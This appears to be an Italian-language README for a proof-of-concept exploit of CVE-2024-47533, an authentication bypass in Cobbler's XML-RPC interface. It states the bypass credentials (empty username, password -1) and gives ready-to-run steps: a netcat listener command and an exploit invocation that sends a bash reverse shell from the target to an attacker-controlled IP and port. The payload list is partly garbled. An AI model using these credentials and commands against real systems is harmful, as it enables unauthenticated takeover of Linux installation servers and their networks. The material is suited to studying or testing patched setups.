
CVE-2024-47533 è una vulnerabilità critica di bypass dell'autenticazione in Cobbler (versioni 3.0.0 fino a precedenti 3.2.3 e 3.3.7) che consente l'esecuzione remota di codice non autenticata tramite l'interfaccia XMLRPC.
⚠️ Esecuzione Remota di Codice Critica tramite Bypass dell'Autenticazione in Cobbler
🛠️ Implementazione PoC di @dollarboysushil
Cobbler, un server di installazione Linux che consente la configurazione rapida di ambienti di installazione di rete, presenta una vulnerabilità di autenticazione nelle versioni da 3.0.0 fino (escluse) 3.2.3 e 3.3.7. La funzione utils.get_shared_secret() restituisce sempre -1, consentendo a chiunque di connettersi all'interfaccia XML-RPC di Cobbler con un nome utente vuoto ('') e password -1. Ciò permette a un attaccante con accesso di rete di ottenere il controllo completo del server Cobbler. La vulnerabilità è stata corretta nelle versioni 3.2.3 e 3.3.7.
La vulnerabilità è causata da una gestione impropria del segreto condiviso nella funzione utils.get_shared_secret(), che restituisce sempre -1, bypassando di fatto l'autenticazione. Ciò consente a qualsiasi utente di rete di connettersi all'interfaccia XMLRPC di Cobbler con credenziali vuote ed eseguire comandi arbitrari.
http://<target>:25151/ — Endpoint API XMLRPC di Cobbler
Lo script exploit supporta vari payload di reverse shell, tra cui:
nc, nc2)Avvia un listener Netcat sulla tua macchina:
nc -lvnp 4444

Esegui lo script exploit CVE-2024-47533-dbs.py.
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

In caso di esecuzione riuscita, la reverse shell si riconnetterà al listener, concedendo all'attaccante accesso remoto al server.
